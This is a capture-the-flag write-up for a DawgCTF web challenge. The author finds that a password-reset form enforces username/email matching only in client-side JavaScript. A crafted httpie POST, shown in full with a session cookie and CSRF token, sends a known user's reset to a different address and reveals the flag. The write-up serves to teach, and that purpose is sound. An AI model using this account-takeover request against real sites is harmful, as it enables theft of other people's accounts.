Rating:

>Let's steal someone's account.
http://freewifi.ctf.umbccd.io/

We get the same PCAP for download.

Like in the first part, the /staff.html page is accessed. The codes posted there are invalid, though.

The interesting part (*steal someone's account*) in the capture is the post of /forgotpassword.html

We notice in the form, that the username and the email address used for the recovery link are the same but sent twice in different fields. There is a JS function in the site taking care of this:

<script type="text/javascript">
{
document.getElementsByClassName('form')[0].onsubmit = function() {
var email = document.getElementById('email')
var user = document.getElementById('user')
user.value = email.value
}
}
</script>

This can be exploited, of course, by sending the reset link of the user now known to us (true.grit@umbccd.io) to a different e-mail address.

So we just access the /forgotpassword.html, note the session cookie and the CSRF token and send a malicious request:

http --print HBhb --form https://freewifi.ctf.umbccd.io/forgotpassword.html "Cookie: session=eyJjc3JmX3Rva2VuIjoiMjJkM2Y3MDcwMmRlODE1MGQ2MmIxNWY0OGYxZGE0NTk2NDFlNjUwZiJ9.XpGTcA.rFWe8NOuN2d2sHRGvyNvdezd5o4" user=true.grit@umbccd.io email=truegrit@mailinator.com 'csrf_token=IjIyZDNmNzA3MDJkZTgxNTBkNjJiMTVmNDhmMWRhNDU5NjQxZTY1MGYi.XpGTcA.u7DSvZ-sNEJvL3a7MUT03l-z3WY' submit=Submit

WE get the flag right ways in the response, no need to access the e-mail address:

Flag: **DawgCTF{cl!3nt_s1d3_v@l!d@t!0n_1s_d@ng3r0u5}**